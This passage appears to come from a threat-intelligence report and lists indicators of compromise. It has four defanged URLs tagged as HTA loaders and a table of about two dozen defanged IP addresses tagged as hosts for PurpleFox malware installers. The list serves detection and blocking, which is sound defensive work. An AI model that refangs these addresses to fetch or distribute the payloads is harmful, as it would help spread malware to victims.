hxxps[://]asq[.]d6shiiwz[.]pw/win/hssl/d6[.]hta	URL	HTA Loader
hxxps[://]asd[.]s7610rir[.]pw/win/checking[.]hta	URL	HTA Loader
hxxps[://]d1[.]pool4883[.]pw/win/hssl/r7[.]hta	URL	HTA Loader
hxxp[://]us1[.]somepools555[.]pw/win/checking[.]hta	URL	HTA Loader

PurpleFox

Indicator	Type	Description
58[.]221[.]252[.]210	IP	PurpleFox .msi location
60[.]173[.]116[.]152	IP	PurpleFox .msi location
61[.]136[.]101[.]152	IP	PurpleFox .msi location
61[.]147[.]108[.]92	IP	PurpleFox .msi location
89[.]117[.]2[.]159	IP	PurpleFox .msi location
100[.]1[.]121[.]27	IP	PurpleFox .msi location
103[.]36[.]223[.]87	IP	PurpleFox .msi location
103[.]55[.]70[.]212	IP	PurpleFox .msi location
103[.]83[.]212[.]194	IP	PurpleFox .msi location
103[.]115[.]17[.]90	IP	PurpleFox .msi location
103[.]113[.]195[.]244	IP	PurpleFox .msi location
107[.]175[.]187[.]11	IP	PurpleFox .msi location
110[.]42[.]51[.]229	IP	PurpleFox .msi location
110[.]45[.]196[.]155	IP	PurpleFox .msi location
122[.]165[.]219[.]142	IP	PurpleFox .msi location
156[.]224[.]232[.]98	IP	PurpleFox .msi location
157[.]66[.]153[.]154	IP	PurpleFox .msi location
173[.]208[.]166[.]226	IP	PurpleFox .msi location
187[.]102[.]48[.]229	IP	PurpleFox .msi location
190[.]111[.]12[.]242	IP	PurpleFox .msi location
193[.]112[.]70[.]226	IP	PurpleFox .msi location
201[.]138[.]238[.]195	IP	PurpleFox .msi location
204[.]44[.]110[.]216	IP	PurpleFox .msi location
222[.]73[.]29[.]92	IP	PurpleFox .msi location